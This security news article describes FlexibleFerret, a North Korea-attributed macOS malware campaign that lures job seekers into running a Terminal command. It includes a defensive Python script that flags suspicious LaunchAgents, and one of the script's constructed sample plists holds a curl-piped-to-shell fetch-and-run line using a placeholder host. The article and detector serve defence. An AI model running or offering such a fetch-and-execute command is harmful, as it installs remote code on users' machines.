Hackers Trick macOS Users into Executing a Command in Terminal to Deliver FlexibleFerret Malware

Cybercriminals are successfully targeting Apple users through a sophisticated social engineering scheme that tricks victims into running harmful commands on their computers.

The threat, called FlexibleFerret, is attributed to North Korean operators and represents a continuing evolution of the Contagious Interview campaign that has been active throughout 2025.

The malware primarily spreads through fake job recruitment websites that promise employment opportunities but ultimately deliver credential-stealing backdoors and system access to attackers.

LinkedIn post highlighting recruitment scams (Source - Jamf)

The attack begins innocuously with job seekers visiting realistic-looking hiring assessment websites like evaluza.com and proficiencycert.com.

Victims complete fake job assessments branded with names like “Blockchain Capital Operations Manager Hiring Assessment,” providing personal details and even recording video introductions.

After completing these stages, applicants receive a critical instruction to run a specific Terminal command, which the attackers claim is needed to fix camera or microphone access issues.

Jamf security analysts identified this new variant after discovering in-the-wild detections linked to the script named macpatch.sh.

The researchers found JavaScript files on fraudulent recruitment sites designed to build and execute curl commands that download malicious payloads directly to victims’ computers.

Infection mechanism

The infection mechanism employs a multi-stage delivery process that remains hidden from users. When the initial curl command executes, it downloads a shell script that determines whether the victim’s Mac uses ARM64 or Intel architecture, then fetches the appropriate stage-two payload.

The script creates working directories in temporary locations, establishes persistence through LaunchAgents that automatically launch the malware at login, and displays a convincing fake Chrome application that mimics a legitimate password prompt.

Left - fake Chrome camera access prompt, Right - Chrome-style password prompt (Source - Jamf)

This decoy application captures whatever credentials users enter and sends them to a Dropbox account controlled by the attackers.

The third stage activates when a bundled Golang backdoor runs, establishing communication with a command-and-control server.

This sophisticated component supports multiple operations including system information collection, file upload and download capabilities, command execution, Chrome profile theft, and automated credential harvesting.

The backdoor maintains persistence through LaunchAgent entries and includes error-handling mechanisms that reset the malware if temporary failures occur.
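The persistence described above (a LaunchAgent that starts the malware at login from a temporary working directory) leaves an artefact that is easy to hunt for. The script below is an added defensive example, not Jamf's detection logic or anything from the campaign: it parses LaunchAgent plists, flags agents whose program lives in a temporary or hidden staging directory, or that wrap a shell one-liner invoking curl, and notes when RunAtLoad would fire them at login. The directory heuristics, the sample plists and the paths in them are constructed assumptions for illustration.

```python
"""Triage macOS LaunchAgent plists for the login-persistence pattern described
above: an agent whose program lives in a temporary staging directory, or that
wraps a shell one-liner invoking curl. Added defensive example; the paths and
heuristics here are assumptions, not Jamf's detection logic."""
import plistlib
import re
from pathlib import Path

# Directories a legitimate LaunchAgent rarely executes from (assumed heuristic):
# /tmp, the per-user /var/folders tree, and hidden dot-folders in a home directory.
STAGING_DIR = re.compile(r"^/(?:private/)?(?:tmp|var/folders)/|^/Users/[^/]+/\.[^/]+/")
# Interpreters that turn a plist into a shell one-liner via "-c".
SHELL_WRAPPERS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/env"}


def triage(plist: dict) -> list[str]:
    """Return the reasons an agent looks suspicious; an empty list means nothing matched."""
    reasons = []
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else None)
    if not isinstance(program, str):
        return ["no Program or ProgramArguments"]
    if STAGING_DIR.search(program):
        reasons.append(f"program in staging directory: {program}")
    if program in SHELL_WRAPPERS:
        tail = " ".join(a for a in args[1:] if isinstance(a, str))
        if re.search(r"\bcurl\b", tail):
            reasons.append(f"shell wrapper invokes curl: {tail}")
    if reasons and plist.get("RunAtLoad"):
        reasons.append("RunAtLoad is set (starts at login)")
    return reasons


def triage_bytes(raw: bytes) -> list[str]:
    """Parse one plist (XML or binary) and triage it; a malformed plist is itself a finding."""
    try:
        return triage(plistlib.loads(raw))
    except Exception as exc:
        return [f"unparseable plist: {exc}"]


def scan_directory(directory: Path) -> dict[str, list[str]]:
    """Triage every *.plist in a LaunchAgents directory; return only the flagged entries."""
    findings = {}
    for path in sorted(directory.glob("*.plist")):
        reasons = triage_bytes(path.read_bytes())
        if reasons:
            findings[path.name] = reasons
    return findings


# Constructed sample plists for demonstration (not real indicators from the campaign).
SAMPLE_STAGED = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.constructed.staged</string>
  <key>ProgramArguments</key><array><string>/private/tmp/.staging/agent</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SAMPLE_WRAPPER = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.constructed.wrapper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL https://example.invalid/update.sh | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.constructed.benign</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/helper</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""


if __name__ == "__main__":
    for name, raw in [("staged", SAMPLE_STAGED), ("wrapper", SAMPLE_WRAPPER), ("benign", SAMPLE_BENIGN)]:
        print(f"{name}: {triage_bytes(raw)}")
    # Then look at the real per-user LaunchAgents directory, if present.
    user_agents = Path.home() / "Library" / "LaunchAgents"
    if user_agents.is_dir():
        for name, reasons in scan_directory(user_agents).items():
            print(f"{name} -> {'; '.join(reasons)}")
```

Run it on a Mac and it prints the triage result for each constructed sample and then any flagged entries from the current user's LaunchAgents; point scan_directory at /Library/LaunchAgents or /Library/LaunchDaemons to cover system-wide persistence as well. The heuristics are intentionally narrow so the output is short enough to review by hand; an agent flagged here still needs the program and its origin checked before anything is removed.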

Organizations should educate employees to view unsolicited job assessment requests and Terminal-based fix instructions with extreme suspicion.

Any recruitment communication asking users to execute system commands represents a significant red flag and should be reported immediately to security teams.
